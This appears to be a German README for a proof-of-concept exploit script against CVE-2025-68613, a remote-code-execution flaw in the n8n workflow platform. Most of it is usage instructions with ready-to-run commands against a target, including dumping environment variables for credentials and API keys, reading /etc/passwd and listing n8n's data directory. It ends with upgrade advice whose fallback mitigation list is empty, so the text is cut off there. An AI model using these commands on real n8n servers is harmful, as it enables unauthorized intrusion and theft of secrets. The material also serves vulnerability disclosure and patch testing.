
Proof-of-Concept-Exploit für CVE-2025-68613, eine kritische RCE-Schwachstelle in der n8n-Workflow-Automatisierung über Expression-Injection im executeCommand-Knoten.
Nur für Bildungszwecke und autorisierte Sicherheitsforschung.
Kritische RCE-Sicherheitslücke (CVSS 9.9) in der n8n-Workflow-Automatisierungsplattform. Authentifizierte Benutzer können über den executeCommand-Knoten beliebige Betriebssystembefehle ausführen und dabei Sandbox-Einschränkungen umgehen.
| Feld | Detail |
|---|
| CVE | CVE-2025-68613 |
| CVSS | 9.9 (Kritisch) |
| Betroffene Versionen | >= 0.211.0 < 1.120.4 |
| Authentifizierung erforderlich | Ja (jeder Benutzer mit Workflow-Erstellungsberechtigungen) |
| Getestet auf | n8n 1.119.1 |
| Behoben in | 1.120.4, 1.121.1, 1.122.0 |
n8n wertet Workflow-Knotenparameter serverseitig aus. Der executeCommand-Knoten führt Shell-Befehle direkt auf dem Host mit den Berechtigungen des n8n-Prozesses aus. Jeder authentifizierte Benutzer mit Berechtigungen zum Erstellen oder Bearbeiten von Workflows kann dies missbrauchen, um eine vollständige RCE zu erreichen.
bash poc_final.sh <target> <email> <password> <command>
Beispiele:
# Basis-RCE
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'id'
# Umgebungsvariablen auslesen (kann Anmeldeinformationen/API-Schlüssel enthalten)
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'env'
# Sensible Dateien lesen
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'cat /etc/passwd'
# n8n-Datenverzeichnis auflisten
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'ls -la ~/.n8n/'
Hinweis: Wenn Ihr Passwort Sonderzeichen wie
!enthält, verwenden Sie einfache Anführungszeichen.
Aktualisieren Sie sofort auf n8n >= 1.120.4.
Falls ein Update nicht sofort möglich ist:
Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Erlaubnis zum Testen haben, ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch.